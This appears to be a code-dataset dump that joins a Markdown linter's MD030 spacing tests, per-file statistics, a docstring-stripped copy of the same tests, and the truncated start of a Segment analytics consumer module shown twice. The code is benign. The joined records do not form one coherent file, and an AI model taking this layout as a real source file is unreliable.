Test to make sure this rule does trigger with a document that
contains ordered lists with two spaces after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_1_2():
"""
Test to make sure this rule does trigger with a document that
contains ordered lists with two spaces after the marker and
configuration for multi line lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_2_1():
"""
Test to make sure this rule does not trigger with a document that
contains ordered lists with two spaces after the marker,
and configuration to make it okay.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_1_2():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with one space after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_2_1():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with one space after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two space after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_1_2():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two space after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_2_1():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two space after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker,
single-paragraph and double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two space after the marker,
single-paragraph and double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double_2_1():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md:4:4: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single_nested_double.md:7:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two space after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double_2_1():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two space after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
| 28.714465
| 123
| 0.657307
|
from test.markdown_scanner import MarkdownScanner
import pytest
@pytest.mark.rules
def test_md030_bad_configuration_ol_single():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' must be of type 'int'."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_single_zero():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' is not valid: Allowable values are any integer greater than 0."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' must be of type 'int'."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi_zero():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' is not valid: Allowable values are any integer greater than 0."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_x():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single():
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double():
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested():
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md:4:4: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single_nested_double.md:7:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double():
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
| true
| true
|
1c3e7fd1b3bed5afdc913af0be1beeb3fd3079e9
| 4,332
|
py
|
Python
|
analytics/consumer.py
|
heitorsampaio/analytics-python
|
517c812a9c10ee369407521e36c155c738932ae5
|
[
"Unlicense",
"MIT"
] | null | null | null |
analytics/consumer.py
|
heitorsampaio/analytics-python
|
517c812a9c10ee369407521e36c155c738932ae5
|
[
"Unlicense",
"MIT"
] | null | null | null |
analytics/consumer.py
|
heitorsampaio/analytics-python
|
517c812a9c10ee369407521e36c155c738932ae5
|
[
"Unlicense",
"MIT"
] | null | null | null |
import logging
from threading import Thread
import monotonic
import backoff
import json
from analytics.request import post, APIError, DatetimeSerializer
try:
from queue import Empty
except ImportError:
from Queue import Empty
MAX_MSG_SIZE = 32 << 10
# Our servers only accept batches less than 500KB. Here limit is set slightly
# lower to leave space for extra data that will be added later, eg. "sentAt".
BATCH_SIZE_LIMIT = 475000
class Consumer(Thread):
"""Consumes the messages from the client's queue."""
log = logging.getLogger('segment')
def __init__(self, queue, write_key, flush_at=100, host=None,
on_error=None, flush_interval=0.5, gzip=False, retries=10,
timeout=15):
"""Create a consumer thread."""
Thread.__init__(self)
# Make consumer a daemon thread so that it doesn't block program exit
self.daemon = True
self.flush_at = flush_at
self.flush_interval = flush_interval
self.write_key = write_key
self.host = host
self.on_error = on_error
self.queue = queue
self.gzip = gzip
# It's important to set running in the constructor: if we are asked to
# pause immediately after construction, we might set running to True in
# run() *after* we set it to False in pause... and keep running
# forever.
self.running = True
self.retries = retries
self.timeout = timeout
def run(self):
"""Runs the consumer."""
self.log.debug('consumer is running...')
while self.running:
self.upload()
self.log.debug('consumer exited.')
def pause(self):
"""Pause the consumer."""
self.running = False
def upload(self):
"""Upload the next batch of items, return whether successful."""
success = False
batch = self.next()
if len(batch) == 0:
return False
try:
self.request(batch)
success = True
except Exception as e:
self.log.error('error uploading: %s', e)
success = False
if self.on_error:
self.on_error(e, batch)
finally:
# mark items as acknowledged from queue
for _ in batch:
self.queue.task_done()
return success
def next(self):
"""Return the next batch of items to upload."""
queue = self.queue
items = []
start_time = monotonic.monotonic()
total_size = 0
while len(items) < self.flush_at:
elapsed = monotonic.monotonic() - start_time
if elapsed >= self.flush_interval:
break
try:
item = queue.get(
block=True, timeout=self.flush_interval - elapsed)
item_size = len(json.dumps(
item, cls=DatetimeSerializer).encode())
if item_size > MAX_MSG_SIZE:
self.log.error(
'Item exceeds 32kb limit, dropping. (%s)', str(item))
continue
items.append(item)
total_size += item_size
if total_size >= BATCH_SIZE_LIMIT:
self.log.debug(
'hit batch size limit (size: %d)', total_size)
break
except Empty:
break
return items
def request(self, batch):
"""Attempt to upload the batch and retry before raising an error """
def fatal_exception(exc):
if isinstance(exc, APIError):
# retry on server errors and client errors
# with 429 status code (rate limited),
# don't retry on other client errors
return (400 <= exc.status < 500) and exc.status != 429
else:
# retry on all other errors (eg. network)
return False
@backoff.on_exception(
backoff.expo,
Exception,
max_tries=self.retries + 1,
giveup=fatal_exception)
def send_request():
post(self.write_key, self.host, gzip=self.gzip,
timeout=self.timeout, batch=batch)
send_request()
| 32.088889
| 79
| 0.559557
|
import logging
from threading import Thread
import monotonic
import backoff
import json
from analytics.request import post, APIError, DatetimeSerializer
try:
from queue import Empty
except ImportError:
from Queue import Empty
MAX_MSG_SIZE = 32 << 10
BATCH_SIZE_LIMIT = 475000
class Consumer(Thread):
log = logging.getLogger('segment')
def __init__(self, queue, write_key, flush_at=100, host=None,
on_error=None, flush_interval=0.5, gzip=False, retries=10,
timeout=15):
